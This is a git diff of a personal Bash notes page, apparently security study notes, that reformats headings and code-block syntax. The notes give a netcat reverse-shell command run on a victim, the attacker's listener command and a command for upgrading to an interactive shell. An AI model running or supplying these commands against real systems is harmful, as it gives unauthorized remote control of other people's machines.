--- a/_posts/notes/system/2022-04-25-bash.md
+++ b/_posts/notes/system/2022-04-25-bash.md
@@ -4,20 +4,20 @@ title: 'Notes | Bash'
 permalink: /notes/system/bash/
 ---
 
-# [](#header-4)Reverse Shell
+# Reverse Shell
 If we can execute code in the victim:
-{% highlight plain %}
+{% highlight bash %}
 ... nc -e /bin/sh <ip>:<port>
 {% endhighlight %}
 
 While in the attacker:
-{% highlight plain %}
+{% highlight bash %}
 > nc -lvnp <port>
 {% endhighlight %}
 
-# [](#header-4)After a reverse shell...
+# After a reverse shell...
 We can get a interactive shell with the following command:
-{% highlight plain %}
+{% highlight bash %}
 > script /dev/null -c bash
 {% endhighlight %}
 
